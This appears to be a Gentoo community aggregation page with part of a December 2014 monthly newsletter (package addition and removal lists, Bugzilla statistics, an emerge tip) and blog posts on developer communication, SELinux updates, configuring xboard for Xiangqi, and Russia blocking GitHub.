x11-themes/metacity-themes pacho 13 Nov 2014
x11-wm/metacity pacho 13 Nov 2014
gnome-base/libgdu pacho 13 Nov 2014
rox-base/rox-media pacho 13 Nov 2014
dev-python/gns3-gui patrick 14 Nov 2014
kde-misc/kcm_touchpad mrueg 15 Nov 2014
net-misc/ieee-oui zerochaos 19 Nov 2014
app-shells/zsh-completion radhermit 21 Nov 2014
app-dicts/gnuvd pacho 21 Nov 2014
net-misc/netcomics-cvs pacho 21 Nov 2014
dev-python/kinterbasdb pacho 21 Nov 2014
dev-libs/ibpp pacho 21 Nov 2014
dev-php/PEAR-MDB2_Driver_ibase pacho 21 Nov 2014
net-im/kmess pacho 21 Nov 2014
games-server/halflife-steam pacho 21 Nov 2014
sys-apps/usleep pacho 21 Nov 2014
dev-util/cmockery radhermit 24 Nov 2014
dev-python/pry radhermit 24 Nov 2014
dev-perl/DateTime-Format-DateManip zlogene 26 Nov 2014
www-servers/ocsigen aballier 27 Nov 2014
dev-ml/ocamlduce aballier 27 Nov 2014
dev-perl/Mail-ClamAV zlogene 27 Nov 2014
dev-perl/SVN-Mirror zlogene 27 Nov 2014
dev-embedded/msp430-binutils radhermit 27 Nov 2014
dev-embedded/msp430-gcc radhermit 27 Nov 2014
dev-embedded/msp430-gdb radhermit 27 Nov 2014
dev-embedded/msp430-libc radhermit 27 Nov 2014
dev-embedded/msp430mcu radhermit 27 Nov 2014
mail-filter/spamassassin-fuzzyocr dilfridge 29 Nov 2014

Additions

Package Developer Date
dev-python/python-bugzilla dilfridge 01 Nov 2014
app-vim/sudoedit radhermit 01 Nov 2014
dev-java/icedtea-sound caster 01 Nov 2014
dev-perl/Net-Trackback dilfridge 01 Nov 2014
dev-perl/Syntax-Highlight-Engine-Simple dilfridge 01 Nov 2014
dev-perl/Syntax-Highlight-Engine-Simple-Perl dilfridge 01 Nov 2014
app-i18n/fcitx-qt5 yngwin 02 Nov 2014
virtual/postgresql titanofold 02 Nov 2014
dev-python/oslo-i18n alunduil 02 Nov 2014
dev-libs/libltdl vapier 03 Nov 2014
dev-texlive/texlive-langchinese aballier 03 Nov 2014
dev-texlive/texlive-langjapanese aballier 03 Nov 2014
dev-texlive/texlive-langkorean aballier 03 Nov 2014
app-misc/ltunify radhermit 05 Nov 2014
dev-vcs/gitsh jlec 05 Nov 2014
dev-python/pypy3 mgorny 05 Nov 2014
virtual/pypy3 mgorny 05 Nov 2014
dev-php/PEAR-Math_BigInteger grknight 06 Nov 2014
games-rpg/morrowind-data hasufell 06 Nov 2014
games-engines/openmw hasufell 06 Nov 2014
dev-perl/URI-Encode dilfridge 06 Nov 2014
dev-perl/MIME-Base32 dilfridge 08 Nov 2014
dev-libs/libqtxdg yngwin 08 Nov 2014
app-admin/lxqt-admin jauhien 08 Nov 2014
dev-python/oslo-utils alunduil 08 Nov 2014
net-misc/gns3-server idella4 09 Nov 2014
dev-python/gns3-gui idella4 09 Nov 2014
dev-python/pypy3-bin mgorny 09 Nov 2014
dev-python/oslo-serialization alunduil 09 Nov 2014
dev-python/bashate prometheanfire 10 Nov 2014
dev-python/ldappool prometheanfire 10 Nov 2014
dev-python/repoze-who prometheanfire 10 Nov 2014
dev-python/pysaml2 prometheanfire 10 Nov 2014
dev-python/posix_ipc prometheanfire 10 Nov 2014
dev-python/oslo-db prometheanfire 10 Nov 2014
dev-ml/enumerate aballier 10 Nov 2014
dev-ml/core_bench aballier 10 Nov 2014
dev-util/sysdig mgorny 11 Nov 2014
dev-python/singledispatch idella4 12 Nov 2014
dev-tex/biblatex-apa mrueg 12 Nov 2014
app-emacs/multiple-cursors ulm 12 Nov 2014
dev-python/libnacl chutzpah 13 Nov 2014
dev-python/ioflo chutzpah 13 Nov 2014
dev-python/raet chutzpah 13 Nov 2014
dev-qt/qtchooser pesa 13 Nov 2014
dev-python/dicttoxml chutzpah 13 Nov 2014
dev-python/moto chutzpah 13 Nov 2014
dev-python/gns3-gui idella4 13 Nov 2014
x11-plugins/wmlife voyageur 13 Nov 2014
net-misc/gns3-gui patrick 14 Nov 2014
games-rpg/a-bird-story hasufell 14 Nov 2014
virtual/python-singledispatch idella4 15 Nov 2014
dev-python/kiwisolver idella4 15 Nov 2014
app-forensics/afl hanno 16 Nov 2014
games-board/gambit sping 16 Nov 2014
dev-db/pgrouting titanofold 16 Nov 2014
dev-python/atom idella4 16 Nov 2014
dev-embedded/kobs-ng vapier 18 Nov 2014
dev-python/ordereddict prometheanfire 18 Nov 2014
dev-python/WSME prometheanfire 18 Nov 2014
dev-python/retrying prometheanfire 18 Nov 2014
dev-python/osprofiler prometheanfire 18 Nov 2014
dev-python/glance_store prometheanfire 18 Nov 2014
dev-python/python-barbicanclient prometheanfire 18 Nov 2014
dev-python/rfc3986 prometheanfire 19 Nov 2014
sys-cluster/libquo ottxor 19 Nov 2014
dev-python/flask-migrate patrick 20 Nov 2014
media-libs/libde265 dlan 20 Nov 2014
dev-python/pyqtgraph radhermit 20 Nov 2014
app-shells/gentoo-zsh-completions radhermit 21 Nov 2014
app-shells/zsh-completions radhermit 21 Nov 2014
dev-libs/libsecp256k1 blueness 21 Nov 2014
net-libs/libbitcoinconsensus blueness 21 Nov 2014
net-misc/gns3-converter idella4 22 Nov 2014
dev-python/pytest-timeout jlec 22 Nov 2014
net-dns/libidn2 jer 22 Nov 2014
app-emulation/vpcs idella4 23 Nov 2014
dev-libs/libmacaroons patrick 23 Nov 2014
app-vim/emmet radhermit 24 Nov 2014
sci-libs/orocos-bfl aballier 25 Nov 2014
sys-libs/efivar floppym 26 Nov 2014
dev-python/jmespath aballier 26 Nov 2014
net-misc/python-x2go voyageur 27 Nov 2014
net-misc/pyhoca-cli voyageur 27 Nov 2014
dev-python/simplekv aballier 27 Nov 2014
dev-python/Flask-KVSession aballier 27 Nov 2014
net-misc/pyhoca-gui voyageur 27 Nov 2014
dev-libs/fstrm radhermit 27 Nov 2014
sci-libs/fcl aballier 28 Nov 2014
dev-ml/labltk aballier 28 Nov 2014
dev-ml/camlp4 aballier 28 Nov 2014
dev-python/sphinxcontrib-doxylink aballier 28 Nov 2014
dev-util/cpputest radhermit 29 Nov 2014
app-text/groonga grknight 29 Nov 2014
app-text/groonga-normalizer-mysql grknight 29 Nov 2014
app-forensics/volatility chithanh 29 Nov 2014
dev-perl/Test-FailWarnings dilfridge 30 Nov 2014
dev-perl/RedisDB-Parser dilfridge 30 Nov 2014
dev-perl/RedisDB dilfridge 30 Nov 2014
dev-python/nose_fixes idella4 30 Nov 2014
dev-perl/MooX-Types-MooseLike-Numeric dilfridge 30 Nov 2014

Bugzilla

The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.

Activity

The following tables and charts summarize the activity on Bugzilla between 01 November 2014 and 01 December 2014. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.
gmn-activity-2014-12

Bug Activity Number
New 1858
Closed 1151
Not fixed 215
Duplicates 164
Total 6294
Blocker 4
Critical 14
Major 66

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Security 57
2 Gentoo's Team for Core System packages 54
3 Gentoo Linux Gnome Desktop Team 39
4 Gentoo Perl team 32
5 Tim Harder 30
6 Gentoo Games 29
7 Gentoo KDE team 27
8 Java team 27
9 Gentoo Ruby Team 26
10 Others 829

gmn-closed-2014-12

Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Python Gentoo Team 104
2 Gentoo Linux bug wranglers 97
3 Gentoo Linux Gnome Desktop Team 69
4 Gentoo Security 62
5 Gentoo's Team for Core System packages 56
6 Gentoo KDE team 44
7 Java team 38
8 Default Assignee for New Packages 37
9 Qt Bug Alias 33
10 Others 1317

gmn-opened-2014-12

Tips of the month

(by Alexander Berntsen)
New –alert emerge option

From the emerge(1) manpage

–alert [ y | n ] (-A short option) Add a terminal bell character (‘\a’) to all interactive prompts. This is especially useful if dependency resolution is taking a long time, and you want emerge to alert you when it is finished. If you use emerge -auAD world, emerge will courteously point out when it has finished calculating the graph.

–alert may be ‘y’ or ‘n’. ‘true’ and ‘false’ mean the same thing. Using –alert without an option is the same as using it with ‘y’. Try it with ‘emerge -aA portage’.

If your terminal emulator is set up to make ‘\a’ into a window manager urgency hint, move your cursor to a different window to get the effect.

 

Send us your favorite Gentoo script or tip at gmn@gentoo.org

Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Sometimes I forget how important communication is (December 10, 2014, 18:38 UTC)

Free software (and documentation) developers don’t always have all the time they want. Instead, they grab whatever time they have to do what they believe is the most productive – be it documentation editing, programming, updating ebuilds, SELinux policy improvements and what not. But they often don’t take the time to communicate. And communication is important.

For one, communication is needed to reach a larger audience than those that follow the commit history in whatever repository work is being done. Yes, there are developers that follow each commit, but development isn’t just done for developers, it is also for end users. And end users deserve frequent updates and feedback. Be it through blog posts, Google+ posts, tweets or instragrams (well, I’m not sure how to communicate a software or documentation change through Instagram, but I’m sure people find lots of creative ways to do so), telling the broader world what has changed is important.

Perhaps a (silent or not) user was waiting for this change. Perhaps he or she is even actually trying to fix things himself/herself but is struggling with it, and would really benefit (time-wise) from a quick fix. Without communicating about the change, (s)he does not know that no further attempts are needed, actually reducing the efficiency in overall.

But communication is just one-way. Better is to get feedback as well. In that sense, communication is just one part of the feedback loop – once developers receive feedback on what they are doing (or did recently) they might even improve results faster. With feedback loops, the wisdom of the crowd (in the positive sense) can be used to improve solutions beyond what the developer originally intended. And even a simple “cool” and “I like” is good information for a developer or contributor.

Still, I often forget to do it – or don’t have the time to focus on communication. And that’s bad. So, let me quickly state what things I forgot to communicate more broadly about:

  • A new developer joined the Gentoo ranks: Jason Zaman. Now developers join Gentoo more often than just once in a while, but Jason is one of my “recruits”. In a sense, he became a developer because I was tired of pulling his changes in and proxy-committing stuff. Of course, that’s only half the truth; he is also a very active contributor in other areas (and was already a maintainer for a few packages through the proxy-maintainer project) and is a tremendous help in the Gentoo Hardened project. So welcome onboard Jason (or perfinion as he calls himself online).
  • I’ve started with copying the Gentoo handbook to the wiki. This is still an on-going project, but was long overdue. There are many reasons why the move to the wiki is interesting. For me personally, it is to attract a larger audience to update the handbook. Although the document will be restricted for editing by developers and trusted contributors only (it does contain the installation instructions and is a primary entry point for many users) that’s still a whole lot more than when just a handful (one or two actually) developers update the handbook.
  • The SELinux userspace (2.4 release) is looking more stable; there are no specific regressions anymore (upstream is at release candidate 7) although I must admit that I have not implemented it on the majority of test systems that I maintain. Not due to fears, but mostly because I struggle a bit with available time so I can do without testing upgrades that are not needed. I do plan on moving towards 2.4 in a week or two.
  • The reference policy has released a new version of the policy. Gentoo quickly followed through (Jason did the honors of creating the ebuilds).

So, apologies for not communicating sooner, and I promise I’ll try to uplift the communication frequency.

December 08, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Playing Xiangqi with xboard (December 08, 2014, 20:06 UTC)

Introduction

Out of the box, xboard is expecting you to play western chess. It does support Xiangqi, but the default setup uses ugly western pieces and western square fields rather than lines:

You can make it look more traditional ..

.. but it is not really trivial to get there. Windows users have WinBoard Xiangqi install as an option but Linux users don’t.
You could select board theme “xiangqi” at

MENU / View / Board / # ORIENTAL THEMES / double click on "xiangqi"

but you would end up with broken board scaling (despite xboard 2.8 knowing how to do better) without further tuning.

To summarize you have to teach xboard to

  1. play variant “xiangqi” rather than western chess,
  2. use different graphics, and
  3. get the board scaling right.

The following is a list of related options and how to get board scaling right by using a special symlink.

Prerequisites

  • xboard 2.8 or later (for proper scaling of the board image, see below)
  • a Xiangqi engine, e.g.
    • HoiXiangqi (of HoiChess, games-board/hoichess in Gentoo betagarden) or
    • MaxQi (of FairyMax, games-board/fairymax in Gentoo betagarden).

Command line view

Now some command line parameters need to be passed to xboard:

Tell engine to play chess variant “xiangqi”:

-variant xiangqi

Use images for drawing the board:

-useBoardTexture true

Use xqboard-9x10.png for drawing both light and dark fields of the board:

-liteBackTextureFile /usr/share/games/xboard/themes/textures/xqboard-9x10.png
-darkBackTextureFile /usr/share/games/xboard/themes/textures/xqboard-9x10.png

xqboard-9x10.png can be a symlink to xqboard.png. The “-9x10” part is for the filename parser introduced with xboard 2.8. It ensures proper board rendering at any windows size. Without that naming (and with earlier versions), you need to be lucky for proper scaling.

Suppress drawing squares (of default line-width 1px) around fields:

-overrideLineGap 0

Use SVG images of the traditional Xiangqi pieces:

-pieceImageDirectory /usr/share/games/xboard/themes/xiangqi

Suppress grayscale conversion of piece graphics applied by default:

-trueColors true

Use HoiXiangqi for an engine:

-firstChessProgram /usr/games/bin/hoixiangqi

If you are running Gentoo, feel free to

sudo layman -a betagarden
sudo emerge -av games-board/xboard-xiangqi

to make that a little easier.

December 06, 2014
Sebastian Pipping a.k.a. sping (homepage, bugs)
Russia blocks access to GitHub (December 06, 2014, 15:03 UTC)

Russia Blacklists, Blocks GitHub Over Pages That Refer To Suicide

http://techcrunch.com/2014/12/03/github-russia/